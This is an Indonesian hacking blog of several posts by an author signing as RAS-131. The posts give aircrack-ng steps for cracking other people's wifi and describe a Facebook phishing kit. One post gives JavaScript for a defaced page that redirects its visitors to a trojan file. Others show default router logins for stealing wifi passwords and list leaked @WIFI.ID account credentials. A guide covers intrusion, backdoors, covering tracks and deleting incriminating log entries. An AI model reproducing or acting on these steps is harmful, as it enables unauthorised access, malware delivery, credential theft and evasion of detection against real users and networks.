Ads

Test Footer

Comment

Test Footer

Minggu, 16 Agustus 2015

Hack security WEB dalam jaringan wifi


Persiapan
  •  Usahakan menggunakan mesin virtual seperti Virtual Box atau Vmware 
  •  Atur Compability Wireless anda. 

Langkah Langkah :

1. Nyalakan pc kalian dan login ke root blacktrack
2. Kemudian tulis startx untuk menggunakan mode GUI
3. Buka New Terminal
4. Ketik perintah " airmong-ng wlan0 "
5. Kemudian ketik perintah " airmong-ng start wlan0 "

6. Kemudian temukan mode monitoring
  " airodump-ng mon0 "


7. Kemudian lepas mondisi monitoring dengan menekan ctrl + c kemudian biarkan terminal tersebut terbuka tergantung pada chanel wireless yang kalian pilih.

" airodump-ng -c 11 -b 00:00:00:00 -w ras131 mon0 "


Keterangan :
11 adalah chanel. Ganti angka 11 dengan chanel milik kalian.
00:00:00:00 adalah sebuah BSSID
ras131 adalah sebuah file code yang berisi key brute atack.


kemudian buka terminal lagi dan ketik perintah
" airreplay-ng -1 0 -a 00:00:00 mon0 "


" airreplay-ng -3 0 -b 00:00:00 mon0 "




Buka proses terminal lagi agar data tidak tercampur
" airreplay-ng -0 0 -a 00:00:00 mon0 "

biarkan data berjalan hingga 100.000 atau lebih ..


kemudian buka terminal lagi

" aircrack-ng ras131.cap "



Pastikan nama file.cap  kalian benar dan lihat hasil crack cracking security web yang muncul.









Selasa, 04 Agustus 2015

Hay kawan kawan kali ini saya akan berbaig scrip atau alat untuk hack facebook dengan cara phishing. oke di bawah ini script nya silahkan di copy.


1. Copy code di bawah ini dan simpan dengan nama " index.php "




2. Copy code di bawah ini dan simpan dengan nama " phishing.php "



3. Buat File Text Dokumen bernama " password.txt "

4. Jika sudah buat ke 3 file di atas kemudian upload file tersebut ke dalam sebuah hosting.




Hack By : RAS131




Senin, 22 September 2014





1.Upload virusmu di shell
2.jika sudah selesai di upload,, copy alamat virus tadi misallnya http://target.com/files/trojan.cpl
3.tambahkan kode berikut :

<script type="text/javascript">
<!--
function exec_refresh()
{
window.status = "Redirecting..." + myvar;
myvar = myvar + " .";
var timerID = setTimeout("exec_refresh();", 150);
if (timeout > 5)
{
timeout -= 5;
}
else
{
clearTimeout(timerID);
window.status = "";
window.location = "ALAMAT VIRUS MU DI SINI";
}
}

var myvar = "";
var timeout = 190;
exec_refresh();
//-->
</script>

4. copas script tadi pada file html deface mu, ingat harus dipaste sebelum kode </html> atau pada body html.
5. tinggal diupload file deface mu virusmu tadi.






NB BY : ./RAS-131








Cara Hack Pasword Wifi Orang Lain via Speedy instan 100% Work

 Pertama tama kita harus berada di area wifi dulu jika kita tidak dalam jangkauan wifi atau dalam jangkauan tetapi mempunyai sinyal yang lemah kita akan lebih susah dalam proses hacking. Baiklah gak usah lama lama lagi keburu gak sabar nii hack passwordnya... oke simak torialnya berikut ini :

1. Bila di area wifi ada Speedi instan atau indischool kita mulai proses hacking nya.
2. Bila ada speedy instan atau indischool pasti ada admin utama dari wifi tersebut (Router).
3. Pertama tama kita konneksikan PC ke Speedy instan atau indischool.
4. Buka browser Firefox atau Chrome.
5. Ketik url 192.168.1.1
6. Tekan Enter


7. Akan muncul adminator Login ketik
    Username : admin   
    Password  : admin
             Atau
    Username : user   
    Password  : user

8. Kemudian tekan enter.
9. Dan akan masuk ke dalam setingan router kalian dapat mengetahui password SSID bahkan kalian
    bisa mengubah nama SSID wifi tersebut beserta passwordnya.


Saran :
Agar kalian bisa tetap konek sebaiknya jangan di ubah passwordnya dan SSID nya kita login ke wifinya dengan password yang sudah kalian ketahui. 

Warning :
Jangan di salagunakan cara ini untuk merusak karena hacker bukan perusak tetapi hanya menguji system keamanan saja. Jadi jangan rusak nama baik HACKER.




Hacked By : ./RAS-131







Cara Login @WIFI.ID Unlimited

Khusus untuk login @WIFI.ID via Speedy:

Step 1. Connect SSID @WIFI.ID
Step 2. Pada login page @WIFI.ID pilih Speedy
Step 3. Masukkan Username: 141362100xxx

NB : xxx ganti dengan 3 digit angka terserah yang kalian inginkan.
Ex : 141362100562

Step 4. Success

Tambahan bug

131235100xxx
111235100xxx
111351100xxx
111225100xxx


Khusus untuk login @WIFI.ID via Speedy Instan (Spin):

Step 1. Connect SSID @WIFI.ID
Step 2. Pada login page @WIFI.ID pilih Speedy Instan (Spin)
Step 3. Masukkan salah satu Username dan Password di bawah ini

Username: 89302024051
Password: 75506146029436

Username: 89302024052
Password: 15881732328643

Username: 89302024059
Password: 93613297527468

Username: 89302024056
Password: 83720141438445

Step 4. Success

Khusus untuk login @WIFI.ID via Telkomsel (*303*601#) agar bisa menikmati layanan WIFI gratis yang sekarang hanya 10 Menit ada cara agar kalian bisa kembali menikmati layanan tersebut menjadi 1 Jam, berikut caranya:

Step 1. Connect SSID @WIFI.ID
Step 2. Klik di sini
Step 3. Hubungi *303*601# dengan kartu Telkomsel (AS, Simpati)
Step 4. Masukkan Username dan Password yang kalian dapatkan saat menghubungi *303*601#
Step 5. Success



Attacker by : ./RAS-131





Senin, 08 September 2014


TIPS - TIPS  BAGI  SEORANG  HACKER

  • Kecuali Anda seorang ahli atau hacker profesional, menggunakan taktik ini pada komputer perusahaan atau pemerintah populer adalah meminta masalah. Perlu diketahui ada orang sedikit lebih luas daripada Anda yang melindungi sistem ini untuk mencari nafkah. Setelah ditemukan, mereka kadang-kadang memantau penyusup untuk membiarkan mereka memberatkan dirinya sendiri terlebih dahulu sebelum tindakan hukum diambil. Ini berarti Anda mungkin berpikir Anda memiliki akses bebas setelah hacking ke sistem, padahal sebenarnya, Anda sedang diawasi, dan dapat dihentikan setiap saat.

  • Hacker adalah mereka yang membangun internet, membuat Linux, dan bekerja pada perangkat lunak open source. Ini dianjurkan untuk melihat ke hacker seperti itu cukup dihormati, dan membutuhkan banyak pengetahuan profesional untuk melakukan sesuatu yang serius di lingkungan nyata.

  • Perlu diingat, jika target Anda tidak melakukan yang terbaik untuk membuat Anda keluar, Anda tidak akan pernah menjadi baik. Tentu saja, jangan sombong, jangan berpikir tentang diri sebagai yang terbaik dari yang terbaik. Buatlah tujuan Anda ini: Anda harus menjadi lebih baik dan lebih baik. Setiap hari bahwa Anda tidak belajar sesuatu yang baru adalah hari terbuang. Anda semua yang penting. Menjadi yang terbaik, dengan biaya apapun. Tidak ada setengah cara, Anda harus memberikan sepenuhnya diri. Seperti Yoda akan berkata, "Apakah atau tidak. Tidak ada mencoba."

  • Meskipun besar bahwa ada banyak hukum, pelatihan dasar yang aman tersedia bagi siapa saja, kebenaran yang menyedihkan adalah bahwa Anda tidak akan menjadi biasa-biasa saja bahkan jika Anda tidak melakukan tindakan yang berpotensi ilegal. Anda tidak bisa menjadi siapa pun jika Anda tidak akan menemukan masalah nyata pada sistem nyata, dengan risiko nyata tertangkap. Perlu diingat bahwa.

  • Ingat, hacking bukan tentang membobol komputer, mendapatkan pekerjaan yang dibayar dengan baik, menjual eksploitasi di pasar gelap, atau membantu orang kompromi mesin aman. Anda tidak di sini untuk membantu admin melakukan pekerjaannya. Anda berada di sini untuk menjadi yang terbaik.

  • Baca buku membahas TCP jaringan / IP.

  • Ada perbedaan besar antara hacker dan cracker.

  • Seorang cracker dimotivasi oleh berbahaya (yaitu: uang) alasan, sementara hacker mencoba untuk mengambil informasi dan menimba ilmu melalui eksplorasi - ("melewati keamanan"), pada biaya apapun dan dengan cara apapun yang mungkin tidak selalu hukum.









     Gunakan * nix terminal untuk perintah. Cygwin akan membantu meniru * nix untuk pengguna Windows. Nmap khususnya menggunakan WinPCap untuk berjalan di Windows dan tidak memerlukan Cygwin. Namun, Nmap bekerja buruk pada sistem Windows karena kurangnya soket mentah. Anda juga harus mempertimbangkan menggunakan Linux atau BSD, yang keduanya lebih fleksibel. Kebanyakan distribusi Linux datang dengan banyak alat yang berguna pra-instal.



Mengamankan mesin Anda terlebih dahulu. Pastikan Anda telah sepenuhnya dipahami semua teknik umum untuk melindungi diri sendiri. Mulailah dengan dasar-dasar - Anda telah menemukan sebuah server hosting situs tentang aktivitas ilegal atau mungkin buruk? Mencoba untuk hack dengan cara apapun yang Anda bisa. Jangan mengubah situs, hanya membuat Anda.



Uji target. Dapatkah Anda mencapai sistem remote? Meskipun Anda dapat menggunakan utilitas ping (yang termasuk dalam sebagian besar sistem operasi) untuk melihat apakah target aktif, Anda tidak dapat selalu mempercayai hasil - hal itu bergantung pada protokol ICMP, yang dapat dengan mudah dimatikan oleh administrator sistem paranoid.



Tentukan sistem operasi (OS). Jalankan scan port, dan mencoba POF, atau nmap untuk menjalankan port scan. Ini akan menunjukkan port yang terbuka pada mesin, OS, dan bahkan dapat memberitahu Anda apa jenis firewall atau router yang mereka gunakan sehingga Anda dapat merencanakan tindakan. Anda dapat mengaktifkan deteksi OS di nmap dengan menggunakan saklar -O.

Cari jalan atau port yang terbuka di sistem. Port umum seperti FTP (21) dan HTTP (80) sering terlindung dengan baik, dan mungkin hanya rentan terhadap eksploitasi belum ditemukan.
   -   Coba TCP lainnya dan port UDP yang mungkin telah dilupakan, seperti Telnet dan berbagai port UDP dibiarkan terbuka untuk LAN gaming.
   -   Port terbuka 22 biasanya bukti layanan SSH (secure shell) yang berjalan pada target, yang kadang-kadang dapat brute paksa.




 Crack proses password atau otentikasi. Ada beberapa metode untuk retak password, termasuk kekerasan. Menggunakan kekerasan pada password adalah upaya untuk mencoba setiap kemungkinan password yang terkandung dalam kamus yang telah ditentukan dari software kekerasan.
 
  -   Pengguna sering kecewa menggunakan password yang lemah, sehingga kekerasan dapat mengambil banyak waktu. Namun, telah terjadi peningkatan besar dalam teknik brute-force.
   -  Kebanyakan algoritma hashing lemah, dan Anda dapat secara signifikan meningkatkan kecepatan retak dengan memanfaatkan kelemahan tersebut (seperti Anda dapat memotong algoritma MD5 di 1/4, yang akan memberikan dorongan kecepatan yang besar).
   -   Teknik-teknik baru menggunakan kartu grafis sebagai prosesor lain - dan itu ribuan kali lebih cepat.
   -   Anda dapat mencoba menggunakan Rainbow Tabel untuk password cracking tercepat. Perhatikan bahwa password cracking adalah teknik yang baik hanya jika Anda sudah memiliki hash dari password.
   -   Mencoba setiap password mungkin sementara logging ke mesin remote bukan ide yang baik, karena itu mudah terdeteksi oleh sistem deteksi intrusi, mencemari sistem log, dan waktu bertahun-tahun untuk menyelesaikannya.
    -  Ini sering lebih mudah untuk menemukan jalan lain ke dalam sistem daripada retak password.

 



Dapatkan hak super-user (administrator). Cobalah untuk mendapatkan akses root# jika menargetkan * nix mesin, atau hak administrator jika mengambil pada sistem Windows.

  -   Kebanyakan informasi yang akan menarik penting dilindungi dan Anda memerlukan tingkat tertentu otentikasi untuk mendapatkannya. Untuk melihat semua file pada komputer Anda membutuhkan hak akses super-user - account pengguna yang diberikan hak yang sama sebagai "root" user di Linux dan sistem operasi BSD.
  -   Untuk router ini adalah akun "admin" secara default (kecuali jika telah diubah); untuk Windows, ini adalah account Administrator.
  -   Mendapatkan akses ke koneksi tidak berarti Anda bisa mengakses segalanya. Hanya super user, account administrator, atau account root bisa melakukan ini.




Gunakan berbagai trik. Seringkali, untuk mendapatkan status super-user Anda harus menggunakan taktik seperti membuat buffer overflow, yang menyebabkan memori untuk membuang dan yang memungkinkan Anda untuk menyuntikkan kode atau melakukan tugas di tingkat yang lebih tinggi daripada Anda biasanya resmi.

  -   Dalam sistem unix-seperti ini akan terjadi jika software disadap memiliki setuid bit set, sehingga program akan dijalankan sebagai user yang berbeda (super-user misalnya).
  -   Hanya dengan menulis atau menemukan program yang tidak aman yang dapat Anda jalankan pada mesin mereka akan memungkinkan Anda untuk melakukan hal ini.
 




Buat backdoor. Setelah Anda telah mendapatkan kontrol penuh atas mesin, itu ide yang baik untuk memastikan Anda bisa kembali lagi. Hal ini dapat dilakukan dengan backdooring layanan sistem yang penting, seperti server SSH. Namun, backdoor Anda dapat dihapus selama upgrade sistem berikutnya. Seorang hacker benar-benar berpengalaman akan backdoor compiler itu sendiri, sehingga setiap perangkat lunak dikompilasi akan menjadi cara yang potensial untuk datang kembali.



Menutupi trek Anda. Jangan biarkan administrator tahu bahwa sistem dikompromikan. Jangan mengubah website (jika ada), dan tidak menciptakan lebih banyak file dari yang Anda benar-benar membutuhkan. Jangan membuat setiap pengguna tambahan. Bertindak secepat mungkin. Jika Anda ditambal server seperti sshd, pastikan telah password rahasia Anda keras-kode. Jika seseorang mencoba untuk log-in dengan password ini, server harus membiarkan mereka masuk, tapi harus tidak mengandung informasi penting apapun.



Peringatan !! Warning !!

  -   Hacking ke dalam sistem orang lain mungkin ilegal, jadi jangan lakukan itu kecuali Anda yakin Anda memiliki izin dari pemilik sistem Anda mencoba untuk hack atau Anda yakin itu layak dan Anda tidak akan tertangkap.
  -   Berhati-hatilah jika Anda berpikir Anda telah menemukan celah sangat mudah atau kesalahan mentah di manajemen keamanan. Seorang profesional keamanan melindungi sistem mungkin mencoba untuk menipu Anda atau menata honeypot.
  -   Tidak pernah melakukan sesuatu hanya untuk bersenang-senang. Ingat itu bukan permainan untuk kembali ke jaringan, tetapi kekuatan untuk mengubah dunia. Jangan buang bahwa pada tindakan kekanak-kanakan.
  -   Jika Anda tidak yakin dengan kemampuan Anda, hindari dari membobol perusahaan, pemerintah, atau jaringan militer. Bahkan jika mereka memiliki keamanan yang lemah, mereka bisa memiliki banyak uang untuk melacak dan payudara Anda. Jika Anda menemukan sebuah lubang di jaringan tersebut, yang terbaik untuk menyerahkannya ke hacker yang lebih berpengalaman yang Anda percaya yang dapat menempatkan sistem ini dengan baik.
  -   Jangan menghapus seluruh file log, sebaliknya, hanya menghapus hanya entri memberatkan dari file tersebut. Pertanyaan lain adalah, apakah ada logfile cadangan? Bagaimana jika mereka hanya mencari perbedaan dan menemukan hal-hal yang tepat yang Anda terhapus? Selalu berpikir tentang tindakan Anda. Yang terbaik adalah untuk menghapus garis acak log, termasuk Anda.
  -   Menyalahgunakan informasi ini mungkin lokal dan / atau pemerintah federal tindak pidana (kejahatan). Artikel ini ditujukan untuk informasi dan seharusnya hanya digunakan untuk etika - tujuan - dan tidak ilegal.
  -   Meskipun Anda mungkin pernah mendengar sebaliknya, tidak membantu siapa pun menambal program atau sistem mereka. Hal ini dianggap sangat lumpuh dan menyebabkan dilarang dari sebagian besar masyarakat hacker. Dan jika Anda akan merilis pribadi mengeksploitasi seseorang menemukan, orang ini bisa menjadi musuh Anda - dan orang ini mungkin lebih baik dari Anda.



Singgle Attacker By ./RAS-131







Country Visitor

Popular Posts

All My Blog